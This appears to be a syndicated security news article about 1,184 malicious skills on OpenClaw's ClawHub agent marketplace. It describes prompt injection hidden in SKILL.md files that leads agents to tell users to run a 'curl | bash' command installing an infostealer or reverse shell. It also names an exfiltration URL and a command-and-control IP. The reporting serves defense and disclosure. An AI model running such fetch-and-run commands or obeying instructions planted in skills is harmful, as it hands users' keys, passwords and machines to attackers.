By rssfeeds-admin OpenClaw, an open-source AI agent platform, operates a public skill marketplace called ClawHub, where third-party developers can publish plugins, or “skills,” that extend an agent’s capabilities.
Security researcher @chiefofautism has identified 1,184 malicious skills on OpenClaw’s ClawHub marketplace, with a single threat actor responsible for uploading 677 packages alone, exposing a catastrophic supply chain vulnerability at the heart of the AI agent ecosystem.
The problem: ClawHub allowed anyone to publish with nothing more than a one-week-old GitHub account as verification. Attackers exploited this low barrier to flood the registry with malicious skills disguised as crypto trading bots, YouTube summarizers, and wallet trackers — all with professionally written documentation designed to appear legitimate.
Hidden inside the SKILL.md files were AI prompt instructions engineered to trick the agent into advising users to run commands like:
curl -sL malware_link | bash
On macOS, that single command deployed Atomic Stealer (AMOS), a commodity infostealer that grabbed browser passwords, SSH keys, Telegram sessions, crypto wallet keys, keychain data, and every API key stored in .env files. On other systems, the malware opened a reverse shell, granting the attacker full remote control of the victim’s machine.
Cisco’s AI Defense team ran their Skill Scanner against the top-ranked community skill on ClawHub, a skill called “What Would Elon Do?” that had been artificially gamed to reach the #1 spot. The scan returned 9 security vulnerabilities: 2 Critical, 5 High, and 2 Medium.
The skill silently exfiltrated user data via a curl command to an attacker-controlled server (https://clawbub-skill.com/log), running with output redirected to /dev/null to avoid detection. It also embedded prompt injection payloads to bypass Claude’s safety guidelines — all while being downloaded thousands of times.vallettasoftware+1
This crisis did not emerge overnight. Koi Security had previously audited 2,857 ClawHub skills and found 341 malicious entries, nearly 12% of the entire registry, with 335 linked to a single coordinated campaign codenamed ClawHavoc.
Snyk’s separate audit also identified 341 malicious skills, and a single publisher, “hightower6eu,” uploaded over 314 malicious packages with nearly 7,000 downloads across those entries. All identified malicious skills shared a common command-and-control server at 91.92.242.30.
OpenClaw has since enlisted Google’s VirusTotal to scan all uploaded skills, categorizing them as benign, suspicious, or malicious — with daily re-scans to catch skills that may mutate post-approval.
This is the AI-era equivalent of npm supply chain attacks, with one critical difference: the malicious package operates inside an AI agent with broad system permissions, file access, and the ability to execute terminal commands autonomously.
The attack surface is not a binary payload; it’s encoded in natural language instructions that traditional endpoint detection tools cannot parse or flag.
Organizations running OpenClaw in enterprise environments face a compounded “Shadow AI” risk, where agent-executed actions leave minimal audit trails and bypass conventional proxy-based monitoring.
Follow us on Google News, LinkedIn, and X for daily cybersecurity updates. Contact us to feature your stories.
The post OpenClaw’s Top Skill is a Malware that Stole SSH Keys, and Opened Reverse Shells in 1,184 Packages appeared first on Cyber Security News.
Discover more from RSS Feeds Cloud
Subscribe to get the latest posts sent to your email.